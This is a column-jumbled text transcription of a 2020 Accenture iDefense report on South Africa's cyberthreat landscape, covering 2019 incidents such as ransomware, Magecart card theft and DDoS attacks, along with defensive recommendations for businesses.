CYBERTHREAT LANDSCAPE IN SOUTH AFRICA - Accenture
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
INSIGHT INTO THE CYBERTHREAT LANDSCAPE IN SOUTH AFRICA
2 | INSIGHT INTO THE CYBERTHREAT LANDSCAPE IN SOUTH AFRICA
EXECUTIVE SUMMARY
As use, and reliance on technology, In this report, iDefense, an
the Internet and smartphones Accenture security intelligence
grows in South Africa, so does the company, looks at the trends and
attack surface and the opportunity incidents from 2019, identifying
for cyberthreat actors. In 2019, the reasons for these attacks,
South Africa saw a spike in and suggesting ways in which
cyberattacks on all fronts—banks, businesses in South Africa can
Internet service providers (ISPs), better prepare themselves to
utilities and ecommerce platforms defend against them.
were hit, as were consumers.
INSIGHT
INSIGHTINTO
INTOTHE
THECYBER
CYBERTHREAT
THREAT LANDSCAPE IN SOUTH AFRICA | 3
Copyright © 2020 Accenture. All rights reserved.
OVERVIEW
South Africa experienced a cross-industry spike in cyber attacks in 2019. The following
facts and figures, taken from a variety of sources over the past 12 months, indicate the
scale of the problem:
• Cybersecurity company Kaspersky has • Card-not-present (CNP) fraud on South
noted that malware attacks in South African-issued credit cards remained
Africa increased by 22 percent1 in the the leading contributor to gross fraud
first quarter of 2019 compared to the losses in the country, accounting for
first quarter of 2018, which translates 79.5 percent of all losses. 4
to just under 577 attempted attacks per
hour. • South Africa has seen an increase
of more than 100 percent in mobile
• Android mobile phones in South Africa banking application fraud.5
were the second most targeted2 by
banking malware, second only to those
In addition to these worrying general
in Russia.
trends, 2019 was a year in which a range
of different threat actors found success
• Virtual-currency-related crime is on
the rise,3 with hackers increasingly when attacking high-profile South African
using people’s phones to mine targets, from ISPs to electricity providers,
cryptocurrencies. as the following section shows.
4 | INSIGHT INTO THE CYBER
CYBERTHREAT
THREATLANDSCAPE
LANDSCAPEIN
INSOUTH
SOUTHAFRICA
AFRICA
Copyright © 2020 Accenture. All rights reserved.TIMELINE OF NOTABLE
ATTACKS
February 2019: A South African energy 35 instances in 17 countries in which North
supplier suffered two security breaches Korean threat actors used cyber attacks
in quick succession. In the first, a staff
6
to illegally raise funds.9 The majority
member incurred an infection from of these countries were developing
the information stealer AZORult after countries, and South Africa was on the
downloading a game from the Internet. list. These incidents took the form of
In the second, a security researcher attacks through the Society for Worldwide
discovered an unsecured database Interbank Financial Telecommunication
containing sensitive information. (SWIFT) system which is used to transfer
money between banks; the theft of
July 2019: The South African Civil Aviation cryptocurrency by attacking both
Authority (SACAA) reported a failure of exchanges and users; and the mining
some of its IT systems. A representative
7 of cryptocurrency. A bank in Africa was
announced that “some files had suspicious though to have been a victim of a SWIFT-
characteristics”, resulting in some servers based attack, but South African banks
being disconnected from the network by denied any security breaches.
SACAA.
September 2019: Garmin South Africa
July 2019: Ransomware infected a disclosed that sensitive customer payment
provider of pre-paid electricity. The
8 data entered into its shopping portal, shop.
malware encrypted the company’s internal garmin.co.za, had been stolen.10 Magecart
network, Web applications and official is a type of cyberattack in which malicious
website, leaving customers without power. code is implanted on ecommerce sites
The infection occurred on July 24, which to steal credit card information as people
is the day before a standard payday for transact online. This Magecart incident
many South Africans when many purchase affected 6,700 South African customers.
new electricity packages for the upcoming The stolen data contained payment
month. information, including card numbers,
expiration dates and CVV codes, first and
August 2019: The United Nations last names, physical addresses, phone
announced an investigation into at least numbers and e-mail addresses.
INSIGHT INTO THE CYBERTHREAT LANDSCAPE IN SOUTH AFRICA | 5
Copyright © 2020 Accenture. All rights reserved.Such stolen data often finds its way to Dark a ransomware attack, but it was later
Web online marketplaces where threat established that nothing was encrypted.
actors purchase it and use it to defraud A group calling itself Shadow Kill Hackers
victims. claimed responsibility and attempted to
extort its victim. The group also claimed
September 2019: On September 21, to have gained access to the networks
2019, one of South Africa’s largest ISPs of a South African hotel accommodation
suffered a distributed denial of service service. The city noted that the attack
(DDoS) attack lasting two days. The 11 was carefully timed to coincide with city
attack also targeted another South African month-end processes affecting supplier
ISP. The attack resulted in clients losing and customer payments.
connectivity or receiving degraded
performance throughout the weekend. October 2019: Also in October, several
The attack technique, known as “carpet South African banks, as well as financial
bombing”, sends junk traffic to random IP institutions in Singapore and Scandinavia,
addresses in a target network, facilitating suffered DDoS attacks, resulting in a loss
a DDoS attack. Attackers have used this of service.13 Threat actors issued a ransom
method for many years but use spiked in note pretending to be Russian threat actor
2018 due to the proliferation of stresser groups Fancy Bear and Cozy Bear. This
and booter (on-demand DDoS attack) attack was similar to a 2017 campaign
services. Threat actors have previously in which threat actors targeted backend
used such services to take down ISPs servers rather than public websites,
in other developing countries, such as knowing that such servers were less
Cambodia and Liberia. likely to have DDoS mitigation protection.
The DDoS attacks occurred on payday,
October 2019: A breach of a major resulting in delayed paychecks, which
South African city network resulted in suggests that threat actors planned the
unauthorised access to its systems.12 attacks to cause maximum disruption.
Officials said the attack affected its call
centers, website and online platforms.
News sources reported this incident as
6 | INSIGHT INTO THE CYBER
CYBERTHREAT
THREATLANDSCAPE
LANDSCAPEIN
INSOUTH
SOUTHAFRICA
AFRICA
Copyright © 2020 Accenture. All rights reserved.WHY IS SOUTH AFRICA
SUCH AN ATTRACTIVE
TARGET?
Threat actors may perceive South African organisations as having lower defensive
barriers than companies in more developed economies. They may also believe that
they have a lower chance of being caught or prosecuted. iDefense suggests that
the increased focus on South Africa by cyberthreat actors is due to the following
interconnected factors:
• Lack of investment in cyber security: scrutiny of its impact on privacy and
South Africa struggles with high crime freedom of expression has resulted
rates, inequality and poverty, high in delays. In addition, while the South
unemployment and a shortage of African Police Service is now also
skilled labor. While many developing empowered to act against such crimes,
economies consider cyber security a lack of cybercrime training may
a necessity, businesses often cannot cause challenges in the short term.
invest sufficient funds. Those that
can invest, face shortages of trained • Poor public knowledge of cyber
cybersecurity practitioners. This threats: South Africa has the second
hampers South Africa’s ability to put highest GDP15 and operates the second
measures in place to prevent and fastest Internet16 in Africa. Investment
mitigate advanced threats. in new tech startups is booming17
and the country is employing
• Developing cybercrime legislation technological solutions to achieve
and law enforcement training: a vast array of business and social
Developing countries often lack needs. However, iDefense analysts
comprehensive cybercrime note that South African Internet users
legislation , making them safe havens
14
are inexperienced and less technically
for illegal operations. South Africa alert than users in other nations.
has been slow to adopt cybercrime
legislation. While the National
Assembly adopted the Cyber Crimes
Bill in January 2020, intense public
INSIGHT
INSIGHTINTO
INTOTHE
THECYBER
CYBERTHREAT
THREAT LANDSCAPE IN SOUTH AFRICA | 7
Copyright © 2020 Accenture. All rights reserved.One report concluded that a worrying in South African companies . After
31 percent of South Africans thought conducting a survey of South African
that a cyber threat that encrypts files IT professionals and senior executives,
and demands payments is a Trojan one recent report concluded that “We
virus, and that more than 50 percent of have found that organisations have
respondents were not aware of multi- hugely underestimated their exposure
factor authentication or its benefits. As 18
to applications, which could have
an increasing proportion of the population inherent risk to business”. The use
begins connecting to the Internet for of personal devices or applications
the first time, this inexperience paired on business networks can pose a
with increased exposure is a potent significant risk, providing gateways
combination that cyber criminals will try for the deployment of ransomware or
to exploit. While threat actors are still other infection vectors on a network.
attempting to exploit digital platforms
such as banking sites or other places • Threat actors are taking notice:
that store financial data, the mitigation iDefense analysts note that between
strategies these entities deploy are usually 2010 and 2014 they rarely saw any
robust—it is easier to target individuals, Dark Web threat actors mentioning
due to their low levels of technical South Africa (see Exhibit 1). However,
knowledge. mentions picked up slightly between
2014 and 2016. Since 2016 there
• The use of shadow IT: iDefense has been a much higher focus on
analysts note that shadow IT—the South Africa among the criminal
use of applications and infrastructure underground.
without the knowledge of an
enterprise’s IT department—is rife iDefense analysts note that attacks against
250
200
150
100
50
0
10 10 10 11 11 11 12 12 12 13 13 13 14 14 15 15 15 16 16 16 17 17 17 18 18 19 19 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
2- 6- 0- 2- 6- 0- 2- 6- 0- 2- 6- 0- 2- 0- 2- 6- 0- 2- 6- 0- 2- 6- 0- 2- 6- 3- 7- 1-
-0 -0 -1 -0 -0 -1 -0 -0 -1 -0 -0 -1 -0 -1 -0 -0 -1 -0 -0 -1 -0 -0 -1 -0 0 -0 1 -0 1 -0 -0
22 2 4 2 4 2 3 2 5 2 5 2 4 2 5 2 5 2 4 2 6 2 6 2 5 2 7 26 2 8 2 8 2 7 2 8 2 8 2 7 2 9 2 9 2 8 3 0 0 20
Exhibit 1: Mentions of “South Africa” between 2010 and 2020 on Dark Web
8 | INSIGHT INTO THE CYBERTHREAT LANDSCAPE IN SOUTH AFRICA
Copyright © 2020 Accenture. All rights reserved.South Africa are consistent with attacks • Malicious actors use rudimentary
in other world economies. These attacks scams like BEC scams, phishing,
include the use of ransomware, banking vishing and smishing abundantly
Trojans, business e-mail compromise (BEC) against South African targets,
scams and carding fraud. The difference especially small, underequipped
is that South Africa is experiencing these businesses. The use of these scams
threats in bulk for the first time. When remains universal, especially against
iDefense examined the Scandinavian developing countries, as they have less
threat landscape, it found malicious resilience to these scams than
actors could still use rudimentary scams more-advanced economies.
successfully because the targeted
businesses and people had not been • The use of ransomware has increased
exposed to them before. This same trend in popularity. Ransomware is widely
is playing out in South Africa. However, the available for sale across the criminal
threat is amplified as South Africans are underground for as little as US$100.
inherently less aware of cyber threats than This enables unskilled threat actors
the populations of some other nations. to conduct malicious activities simply
by purchasing the tools they need.
iDefense highlights the following iDefense also observed a new trend
areas noted in the targeting of South where advanced threat actor groups
African organisations on cybercriminal target larger entities, such as city
underground forums: administrations, as such targets can
pay higher ransoms.
• The rapid uptake in recent years in
the use of mobile financial services • Some threat actors may consider
(MFS) among South Africans leaves South Africa a testing ground for
users vulnerable to banking Trojans malware.19 As cybersecurity measures
and Android banking malware, the use are not as robust amongst private and
of which has been steadily increasing public enterprises in South Africa as
among threat actors since 2017. In they are in other countries globally,
particular, LokiBot, RedAlert and some actors may test their tools and
Anubis have been under constant techniques against South African
development and are widely available targets before deploying them against
among criminal threat actors. sophisticated targets.
INSIGHT
INSIGHTINTO
INTOTHE
THECYBER
CYBERTHREAT
THREAT LANDSCAPE IN SOUTH AFRICA | 9
Copyright © 2020 Accenture. All rights reserved.WHAT CAN BE DONE?
As cybercrime figures continue to rise, • Prioritise protecting against people-
South African organisations need to get based attacks: Counteracting internal
serious about defending their businesses threats is still one of the biggest
and protecting their customers. iDefense challenges business leaders face today.
recommends a number of actions: making Increases in phishing, ransomware and
use of security and threat intelligence, malicious insider attacks mean that
protecting against internal threats and organisations need to place greater
people-based attacks, and focussing on emphasis on nurturing a security-first
compliance—applying standards and best culture. Training and education are
practices. essential to reinforcing safe behaviors,
both for people within an organisation
• Makes use of security and threat and across entire business ecosystems.
intelligence: This has previously
been the reserve of large, well-funded • Focus on compliance: Many
organisations, but is now accessible organisations already have tools and
and affordable to most businesses. solutions in place to help them with
Accenture’s ninth annual report on data compliance. However, these
“The Cost of Cybercrime” , reported20
tools are often configured incorrectly.
that security intelligence and threat When business tools and services are
sharing provides the greatest cost installed and configured correctly,
savings compared with levels of data compliance follows automatically.
spending (US$2.26 million). Security Particular attention should be paid to
and threat intelligence is not only the reduction of shadow IT.
an important enabling technology
for both discovery and investigation • Prepare for when, not if: The previous
activities, it is a valuable source of points all relate to detection, and
information to understand threats “pre-breach” preparation. For post-
and better use resources against breach incidents, such as those listed
anticipated attacks. in this report, put clear procedures in
place, including an incident-response
capability, post-incident analysis,
backed-up data, anti-DDoS measures
and Cloud access security brokers.
10 | INSIGHT INTO THE CYBER
CYBERTHREAT
THREATLANDSCAPE
LANDSCAPEIN
INSOUTH
SOUTHAFRICA
AFRICA
Copyright © 2020 Accenture. All rights reserved.REFERENCES
1 https://www.fin24.com/Companies/ICT/major-spike-in-sa-cyber-attacks-over-10-000-attempts-
a-day-security-company-20190429
2 https://www.forbes.com/sites/tobyshapshak/2019/05/09/south-africa-has-second-most-
android-banking-malware-attacks-as-cyber-crime-increases/#47a6a6d85d77
3 http://www.itwebafrica.com/security/514-south-africa/246610-virtual-currency-crime-spikes-in-
south-africa
4 https://www.sabric.co.za/media-and-news/press-releases/sabric-annual-crime-stats-2018/
5 http://www.itwebafrica.com/home-pagex/opinion/246661-counting-the-cost-of-cybercrime
6 https://www.bleepingcomputer.com/news/security/power-company-has-security-breach-due-
to-downloaded-game/
7 https://www.fin24.com/Companies/Industrial/sa-civil-aviation-authority-launches-investigation-
into-possible-cyber-hack-20190708
8 https://www.zdnet.com/article/ransomware-incident-leaves-some-johannesburg-residents-
without-electricity/
9 https://apnews.com/ece1c6b122224bd9ac5e4cbd0c1e1d80
10 https://www.bleepingcomputer.com/news/security/garmin-sa-shopping-portal-breach-leads-to-
theft-of-payment-data/
11 https://www.zdnet.com/article/carpet-bombing-ddos-attack-takes-down-south-african-isp-for-
an-entire-day/
12 https://www.zdnet.com/article/city-of-johannesburg-held-for-ransom-by-hacker-gang/
13 https://www.thesslstore.com/blog/cyber-attacks-hit-the-city-of-johannesburg-and-south-
african-banks/
14 https://unctad.org/en/pages/PressRelease.aspx?OriginalVersionID=238
15 https://en.wikipedia.org/wiki/List_of_African_countries_by_GDP_(nominal)
16 https://moguldom.com/220816/10-african-countries-with-the-fastest-broadband-speeds/
17 https://www.forbes.com/sites/tobyshapshak/2020/01/20/african-tech-start-ups-have-record-
investment-year-in-2019/#56e6b62832f9
18 https://www.itweb.co.za/content/4r1lyMRoaVAqpmda
19 https://www.itweb.co.za/content/wbrpOMgPAkeqDLZn
20 “Addressing the growing spectre of cyber crime in Africa: evaluating measures adopted by
South Africa and other regional role players”, Fawzia Cassim. https://www.accenture.com/_
acnmedia/pdf-96/accenture-2019-cost-of-cybercrime-study-final.pdf
INSIGHT
INSIGHTINTO
INTOTHE
THECYBER
CYBERTHREAT
THREAT LANDSCAPE IN SOUTH AFRICA | 11
Copyright © 2020 Accenture. All rights reserved.ABOUT ACCENTURE AUTHORS
Accenture is a leading global professional services company, WANDILE MCANYANA
providing a broad range of services and solutions in strategy, Security Lead, Accenture in Africa
consulting, digital, technology and operations. Combining wandile.mcanyana@accenture.com
unmatched experience and specialised skills across more
than 40 industries and all business functions—underpinned
CLIVE BRINDLEY
by the world’s largest delivery network—Accenture works at
Senior Manager, Security, Accenture in Africa
the intersection of business and technology to help clients
clive.brindley@accenture.com
improve their performance and create sustainable value for
their stakeholders.
YUSOF SEEDAT
Head of Global Geographies, Accenture Research
With 505,000 people serving clients in more than 120
yusof.seedat@accenture.com
countries, Accenture drives innovation to improve the way
the world works and lives.
Visit us at www.accenture.com
MAIN CONTRIBUTORS
PAUL MANSFIELD
Cyber Threat Intelligence Analyst, iDefense
paul.a.mansfield@accenture.com
THOMAS WILLKAN
Cyber Threat Intelligence Analyst, iDefense
thomas.willkan@accenture.com
Copyright © 2020 Accenture The views and opinions expressed in this document are meant to stimulate thought and discussion.
All rights reserved. As each business has unique requirements and objectives, the ideas should not be viewed as
professional advice with respect to your business. This document makes descriptive reference to
Accenture, its logo, and High trademarks that may be owned by others. The use of such trademarks herein is not an assertion of
Performance Delivered are ownership of such trademarks by Accenture and is not intended to represent or imply the existence
trademarks of Accenture. of an association between Accenture and the lawful owners of such trademarks.You can also read
